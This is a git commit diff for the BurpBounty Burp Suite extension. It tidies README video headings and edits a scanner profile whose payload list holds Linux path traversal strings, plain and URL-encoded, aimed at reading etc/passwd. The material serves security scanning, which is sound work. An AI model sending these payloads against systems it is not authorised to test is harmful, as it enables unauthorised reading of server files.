Version 3.1

Eduardo Garcia · Eduardo Garcia · commit e1a5d2f4c968 · 2020-04-07T07:55:19.000+02:00
diff --git a/README.md b/README.md
@@ -39,20 +39,16 @@ This Burp Suite extension allows you, in a quick and simple way, to improve the
 
 <br/>
 
-Blind RCE with BurpBounty using Burp Collaborator<br/>
+**Blind RCE with BurpBounty using Burp Collaborator<br/>**
 
 [![Blind RCE with BurpBounty using Burp Collaborator](https://img.youtube.com/vi/kcyUueb56aM/0.jpg)](https://www.youtube.com/watch?v=kcyUueb56aM)
 
 
-Extract endpoints with BurpBounty<br/>
+**Extract endpoints with BurpBounty<br/>**
 
 [![Extract endpoints with BurpBounty](https://img.youtube.com/vi/ELftJwkY_e0/0.jpg)](https://www.youtube.com/watch?v=ELftJwkY_e0)
 
 
-Blind XXE with BurpBounty using Burp Collaborator<br/>
-
-[![Blind XXE with BurpBounty using Burp Collaborator](https://img.youtube.com/vi/v9lvz0RYirI/0.jpg)](https://www.youtube.com/watch?v=v9lvz0RYirI)
-
 <br/>
 
 
diff --git a/profiles/Linux-PathTraversal-MR.bb b/profiles/Linux-PathTraversal-MR.bb
@@ -1 +1 @@
-[{"Name":"Linux-PathTraversal-MR","Active":true,"Scanner":1,"Author":"@egarme","Payloads":["/../{FILE}","/../../{FILE}","/../../../{FILE}","/../../../../{FILE}","/../../../../../{FILE}","/../../../../../../{FILE}","/../../../../../../../{FILE}","/../../../../../../../../{FILE}","/..%2f{FILE}","/..%2f..%2f{FILE}","/..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["root:x"],"Tags":[],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":2,"payloadsFile":"","grepsFile":"","IssueName":"Linux-PathTraversal","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Path traversal with payloads: \u003cbr\u003e \u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Payload","match":"{FILE}","replace":"etc/passwd","regex":"String","comment":"Generic comment"}],"VariationAttributes":[],"InsertionPointType":[1,6,0,37],"pathDiscovery":false}]
+[{"Name":"Linux-PathTraversal-MR","Active":true,"Scanner":1,"Author":"@egarme","Payloads":["/../{FILE}","/../../{FILE}","/../../../{FILE}","/../../../../{FILE}","/../../../../../{FILE}","/../../../../../../{FILE}","/../../../../../../../{FILE}","/../../../../../../../../{FILE}","/..%2f{FILE}","/..%2f..%2f{FILE}","/..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["root:x"],"Tags":[],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Linux-PathTraversal","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Path traversal with payloads: \u003cbr\u003e \u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Payload","match":"{FILE}","replace":"etc/passwd","regex":"String","comment":"Generic comment"}],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"pathDiscovery":false}]

Original file line number	Diff line number	Diff line change
`@@ -1 +1 @@`
`1`		-[{"Name":"Linux-PathTraversal-MR","Active":true,"Scanner":1,"Author":"@egarme","Payloads":["/../{FILE}","/../../{FILE}","/../../../{FILE}","/../../../../{FILE}","/../../../../../{FILE}","/../../../../../../{FILE}","/../../../../../../../{FILE}","/../../../../../../../../{FILE}","/..%2f{FILE}","/..%2f..%2f{FILE}","/..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["root:x"],"Tags":[],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":2,"payloadsFile":"","grepsFile":"","IssueName":"Linux-PathTraversal","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Path traversal with payloads: \u003cbr\u003e \u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Payload","match":"{FILE}","replace":"etc/passwd","regex":"String","comment":"Generic comment"}],"VariationAttributes":[],"InsertionPointType":[1,6,0,37],"pathDiscovery":false}]
	`1`	+[{"Name":"Linux-PathTraversal-MR","Active":true,"Scanner":1,"Author":"@egarme","Payloads":["/../{FILE}","/../../{FILE}","/../../../{FILE}","/../../../../{FILE}","/../../../../../{FILE}","/../../../../../../{FILE}","/../../../../../../../{FILE}","/../../../../../../../../{FILE}","/..%2f{FILE}","/..%2f..%2f{FILE}","/..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["root:x"],"Tags":[],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Linux-PathTraversal","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Path traversal with payloads: \u003cbr\u003e \u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Payload","match":"{FILE}","replace":"etc/passwd","regex":"String","comment":"Generic comment"}],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"pathDiscovery":false}]